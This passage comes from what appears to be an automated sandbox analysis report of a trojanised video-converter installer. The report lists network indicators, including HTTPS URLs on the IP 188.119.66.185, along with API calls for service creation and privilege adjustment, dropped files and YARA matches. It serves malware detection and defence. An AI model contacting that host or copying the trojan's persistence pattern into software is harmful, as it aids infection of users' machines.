                  Source: videoconverterfactory.exe, 00000003.00000003.2597668759.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/rosoft
                  Source: videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003368000.00000004.00000020.00020000.00000000.sdmp, videoconverterfactory.exe, 00000003.00000003.2597668759.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/yX
                  Source: Oz2UhFBTHy.exe, 00000000.00000002.2625346135.00000000020A1000.00000004.00001000.00020000.00000000.sdmp, Oz2UhFBTHy.exe, 00000000.00000003.1357693021.0000000002320000.00000004.00001000.00020000.00000000.sdmp, Oz2UhFBTHy.exe, 00000000.00000003.1357767019.00000000020A1000.00000004.00001000.00020000.00000000.sdmp, Oz2UhFBTHy.tmp, 00000002.00000002.2626002203.0000000002168000.00000004.00001000.00020000.00000000.sdmp, Oz2UhFBTHy.tmp, 00000002.00000003.1359995199.0000000002168000.00000004.00001000.00020000.00000000.sdmp, Oz2UhFBTHy.tmp, 00000002.00000003.1359914020.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, Oz2UhFBTHy.tmp, 00000002.00000002.2624390518.0000000000807000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.easycutstudio.com/support.html
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
                  Source: unknownHTTPS traffic detected: 188.119.66.185:443 -> 192.168.2.9:49837 version: TLS 1.2
                  Source: is-T8AR0.tmp.2.drBinary or memory string: DirectDrawCreateExmemstr_d1dcb678-6
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_0042F520 NtdllDefWindowProc_A,2_2_0042F520
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_00423B84 NtdllDefWindowProc_A,2_2_00423B84
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_004125D8 NtdllDefWindowProc_A,2_2_004125D8
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_00478AC0 NtdllDefWindowProc_A,2_2_00478AC0
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_00457594 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,2_2_00457594
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_0042E934: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,2_2_0042E934
                  Source: C:\Users\user\Desktop\Oz2UhFBTHy.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_004555E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,2_2_004555E4
                  Source: C:\Users\user\Desktop\Oz2UhFBTHy.exeCode function: 0_2_0040840C0_2_0040840C
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_004706A82_2_004706A8
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_004809F72_2_004809F7
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_004352C82_2_004352C8
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_004673A42_2_004673A4
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_0043DD502_2_0043DD50
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_0043035C2_2_0043035C
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_004444C82_2_004444C8
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_004345C42_2_004345C4
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_00444A702_2_00444A70
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_00486BD02_2_00486BD0
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_00430EE82_2_00430EE8
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_0045F0C42_2_0045F0C4
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_004451682_2_00445168
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_0045B1742_2_0045B174
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_004694042_2_00469404
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_004455742_2_00445574
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_004519BC2_2_004519BC
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_00487B302_2_00487B30
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_0048DF542_2_0048DF54
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_004010003_2_00401000
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_004067B73_2_004067B7
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_609660FA3_2_609660FA
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_6092114F3_2_6092114F
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_6091F2C93_2_6091F2C9
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_6096923E3_2_6096923E
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_6093323D3_2_6093323D
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_6095C3143_2_6095C314
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_609503123_2_60950312
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_6094D33B3_2_6094D33B
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_6093B3683_2_6093B368
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_6096748C3_2_6096748C
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_6093F42E3_2_6093F42E
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_609544703_2_60954470
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_609615FA3_2_609615FA
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_6096A5EE3_2_6096A5EE
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_6096D6A43_2_6096D6A4
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_609606A83_2_609606A8
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_609326543_2_60932654
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_609556653_2_60955665
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_6094B7DB3_2_6094B7DB
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_6092F74D3_2_6092F74D
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_609648073_2_60964807
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_6094E9BC3_2_6094E9BC
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_609379293_2_60937929
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_6093FAD63_2_6093FAD6
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_6096DAE83_2_6096DAE8
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_6094DA3A3_2_6094DA3A
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_60936B273_2_60936B27
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_60954CF63_2_60954CF6
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_60950C6B3_2_60950C6B
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_60966DF13_2_60966DF1
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_60963D353_2_60963D35
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_60909E9C3_2_60909E9C
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_60951E863_2_60951E86
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_60912E0B3_2_60912E0B
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_60954FF83_2_60954FF8
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_02D3BAFD3_2_02D3BAFD
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_02D42A803_2_02D42A80
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_02D3D32F3_2_02D3D32F
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_02D370C03_2_02D370C0
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_02D2E07F3_2_02D2E07F
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_02D4267D3_2_02D4267D
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_02D3B6093_2_02D3B609
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_02D3874A3_2_02D3874A
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_02D3BF153_2_02D3BF15
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_02D40DB43_2_02D40DB4
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_02D596C93_2_02D596C9
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_02D596873_2_02D59687
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_02D597573_2_02D59757
                  Source: Joe Sandbox ViewDropped File: C:\ProgramData\VideoConverterFactory\sqlite3.dll 16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: String function: 00408C0C appears 45 times
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: String function: 00406AC4 appears 43 times
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: String function: 0040595C appears 117 times
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: String function: 00457F1C appears 73 times
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: String function: 00403400 appears 60 times
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: String function: 00445DD4 appears 45 times
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: String function: 00457D10 appears 96 times
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: String function: 004344DC appears 32 times
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: String function: 004078F4 appears 43 times
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: String function: 00403494 appears 83 times
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: String function: 00403684 appears 225 times
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: String function: 00453344 appears 97 times
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: String function: 004460A4 appears 59 times
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: String function: 02D37760 appears 32 times
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: String function: 02D42A10 appears 135 times
                  Source: Oz2UhFBTHy.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                  Source: Oz2UhFBTHy.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                  Source: Oz2UhFBTHy.tmp.0.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                  Source: is-OIHIC.tmp.2.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                  Source: is-OIHIC.tmp.2.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                  Source: is-OIHIC.tmp.2.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                  Source: sqlite3.dll.3.drStatic PE information: Number of sections : 19 > 10
                  Source: is-9MUD1.tmp.2.drStatic PE information: Number of sections : 19 > 10
                  Source: Oz2UhFBTHy.exe, 00000000.00000003.1358253344.00000000020A8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs Oz2UhFBTHy.exe
                  Source: Oz2UhFBTHy.exe, 00000000.00000003.1358092526.0000000002320000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs Oz2UhFBTHy.exe
                  Source: Oz2UhFBTHy.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                  Source: classification engineClassification label: mal100.troj.evad.winEXE@5/30@0/3
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_02D2F8D0 _memset,FormatMessageA,GetLastError,FormatMessageA,GetLastError,3_2_02D2F8D0
                  Source: C:\Users\user\Desktop\Oz2UhFBTHy.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_004555E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,2_2_004555E4
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_00455E0C GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,2_2_00455E0C
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CreateServiceA,3_2_004016F8
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: CreateServiceA,3_2_0040D639
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_0046E0E4 GetVersion,CoCreateInstance,2_2_0046E0E4
                  Source: C:\Users\user\Desktop\Oz2UhFBTHy.exeCode function: 0_2_00409C34 FindResourceA,SizeofResource,LoadResource,LockResource,0_2_00409C34
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_0040D0BB StartServiceCtrlDispatcherA,3_2_0040D0BB
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_0040D0BB StartServiceCtrlDispatcherA,3_2_0040D0BB
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpFile created: C:\Users\user\AppData\Local\ProgramsJump to behavior
                  Source: C:\Users\user\Desktop\Oz2UhFBTHy.exeFile created: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmpJump to behavior
                  Source: Yara matchFile source: 3.0.videoconverterfactory.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000000.1372320071.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\is-LETAI.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe, type: DROPPED
                  Source: Yara matchFile source: C:\ProgramData\VideoConverterFactory\VideoConverterFactory.exe, type: DROPPED
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpFile read: C:\Windows\win.iniJump to behavior
                  Source: C:\Users\user\Desktop\Oz2UhFBTHy.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
                  Source: videoconverterfactory.exe, videoconverterfactory.exe, 00000003.00000003.1379802444.000000000071B000.00000004.00000020.00020000.00000000.sdmp, videoconverterfactory.exe, 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, is-9MUD1.tmp.2.dr, sqlite3.dll.3.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                  Source: videoconverterfactory.exe, 00000003.00000003.1379802444.000000000071B000.00000004.00000020.00020000.00000000.sdmp, videoconverterfactory.exe, 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, is-9MUD1.tmp.2.dr, sqlite3.dll.3.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                  Source: videoconverterfactory.exe, videoconverterfactory.exe, 00000003.00000003.1379802444.000000000071B000.00000004.00000020.00020000.00000000.sdmp, videoconverterfactory.exe, 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, is-9MUD1.tmp.2.dr, sqlite3.dll.3.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                  Source: videoconverterfactory.exe, 00000003.00000003.1379802444.000000000071B000.00000004.00000020.00020000.00000000.sdmp, videoconverterfactory.exe, 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, is-9MUD1.tmp.2.dr, sqlite3.dll.3.drBinary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
                  Source: videoconverterfactory.exe, 00000003.00000003.1379802444.000000000071B000.00000004.00000020.00020000.00000000.sdmp, videoconverterfactory.exe, 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, is-9MUD1.tmp.2.dr, sqlite3.dll.3.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                  Source: videoconverterfactory.exe, 00000003.00000003.1379802444.000000000071B000.00000004.00000020.00020000.00000000.sdmp, videoconverterfactory.exe, 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, is-9MUD1.tmp.2.dr, sqlite3.dll.3.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                  Source: videoconverterfactory.exe, 00000003.00000003.1379802444.000000000071B000.00000004.00000020.00020000.00000000.sdmp, videoconverterfactory.exe, 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, is-9MUD1.tmp.2.dr, sqlite3.dll.3.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                  Source: videoconverterfactory.exe, 00000003.00000003.1379802444.000000000071B000.00000004.00000020.00020000.00000000.sdmp, videoconverterfactory.exe, 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, is-9MUD1.tmp.2.dr, sqlite3.dll.3.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                  Source: videoconverterfactory.exe, 00000003.00000003.1379802444.000000000071B000.00000004.00000020.00020000.00000000.sdmp, videoconverterfactory.exe, 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, is-9MUD1.tmp.2.dr, sqlite3.dll.3.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                  Source: videoconverterfactory.exe, 00000003.00000003.1379802444.000000000071B000.00000004.00000020.00020000.00000000.sdmp, videoconverterfactory.exe, 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, is-9MUD1.tmp.2.dr, sqlite3.dll.3.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
